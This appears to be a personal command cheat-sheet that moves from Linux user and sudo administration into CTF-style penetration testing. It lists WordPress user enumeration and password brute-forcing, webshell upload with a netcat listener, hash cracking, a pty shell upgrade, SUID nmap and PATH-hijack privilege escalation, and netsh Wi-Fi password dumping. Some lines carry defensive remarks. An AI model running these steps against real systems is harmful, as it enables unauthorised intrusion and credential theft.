#users
passwd
sudo passwd <user>
sudo passwd <user> -d   # -d deletes the password (account is left with an empty one); use -l to lock the account instead
sudo adduser <user>
sudo visudo
<user> ALL=(ALL:ALL) ALL
<user> ALL = NOPASSWD: ALL
# NOPASSWD: ALL = full root with no password prompt; limit it to specific commands where possible
update-alternatives --set editor /usr/bin/vim
sudo userdel -r <user>
/etc/sudoers usermod visudo
windows:
netsh wlan show profiles
netsh wlan show profile <ssid>
vim to clipboard:
V
:w !pbcopy
:%w !pbcopy
pentest:
install uniscan
uniscan -h
uniscan -u <url/> -qweds
wget ...
file <name>
wc -w
sort -u > file.txt
wordpress
update:
cd wpscan
ruby wpscan.rb --update
find . -type f -name 'wpscan.rb'
wpscan --help
plugins
ruby wpscan.rb --url http://yourwebsite.com --enumerate vp
themes
ruby wpscan.rb --url http://yourwebsite.com --enumerate vt
users
ruby wpscan.rb --url http://yourwebsite.com --enumerate u --proxy_host <ip> --proxy_port port
ruby wpscan.rb --url http://yourwebsite.com --wordlist passwords.txt threads 50 --username <>
webshells
apt install webshells
update ip and add port
wp theme update php
nc -lvnp <port>
find users:
cd /etc
cat passwd
cd /home/<user>
hash-identifier
apt install hash-identifier
hash-identifier <hash>
hashcat
apt install hashcat
hashcat -a 0 -m 0 <hash file> <wordlist file>
python -c 'import pty; pty.spawn("/bin/sh")'
su <name>
password:
setuid (set-user-ID) files, permission bit 4000 - audit these, any unexpected one is a privilege-escalation risk
find / -user <name> -perm -4000
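nmap --interactive   # only old nmap builds have this mode; it is a risk when nmap is setuid root - fix: chmod u-s on the binary or upgrade nmap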
!sh
netdiscover
apt install netdiscover
echo 2323 | base64 --decode
nikto
apt install nikto
nikto -host <ip> -useproxy <ip>
cewl - build a password wordlist from the words on a website
apt install cewl
cewl --proxy_host <ip> --proxy_port port url -w filename
burp suite
dirb webscanner
apt install dirb
ftp
open <ip> <port>
mget
strings - search binary file for strings
echo $PATH
export PATH=/<>:.....
echo '/bin/bash' > /tmp/cat
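chmod +x /tmp/cat
# defence: privileged scripts/binaries should call commands by absolute path and set their own PATH (no writable dirs, no '.')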